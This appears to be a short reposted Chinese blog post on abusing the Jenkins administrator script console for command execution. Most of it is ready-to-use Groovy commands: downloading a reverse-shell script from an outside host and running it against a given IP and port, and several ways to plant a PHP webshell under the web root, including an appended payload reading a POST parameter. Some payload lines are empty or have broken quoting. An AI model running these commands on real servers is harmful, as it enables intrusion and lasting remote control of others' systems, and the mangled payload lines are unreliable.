Jenkins脚本命令执行漏洞小总结
1,系统介绍
Jenkins是一个开源软件项目,旨在提供一个开放易用的软件平台,使软件的持续集成变成可能。
2,漏洞描述
Jenkins管理登陆之后,后台”系统管理”功能,有个”脚本命令行的”功能,它的作用是执行用于管理或故障探测或诊断的任意脚本命令,功能如图:
jenkins命令执行漏洞
利用该功能,可以执行系统命令,例如执行”whoami”命令,如图所示:
命令执行漏洞
该功能实际上Jenkins正常的功能,由于很多管理账号使用了弱口令,或者管理后台存在未授权访问,导致该功能会对Jenkins系统服务器产生比较严重的影响和危害。
3,漏洞利用
1) 直接wget下载back.py反弹shell,如下:
println "wget https://woj.app/tools/back.py -P /tmp/".execute().text
println "python /tmp/back.py 10.1.1.111 8080".execute().text
2)多种写webshell方法,如下:
① wget写webshell
println "wget https://woj.app/data/t.txt -o /var/www/html/media.php".execute().text
②
new File("/var/www/html/media.php").write('');
③
def webshell = ''
new File("/var/www/html/media.php").write("$webshell");
④追加法写webshell
def execute(cmd) {
def proc = cmd.execute()
proc.waitFor()
}
execute( [ 'bash', '-c', 'echo -n " execute( [ 'bash', '-c', 'echo "_POST[s3cpu1se]);?>" >> /usr/local/nginx_1119/html/media.php' ] )
//参数-n 不要在最后自动换行
文章来源:http://www.nxadmin.com/penetration/1372.html
布施恩德可便相知重
微信扫一扫打赏
支付宝扫一扫打赏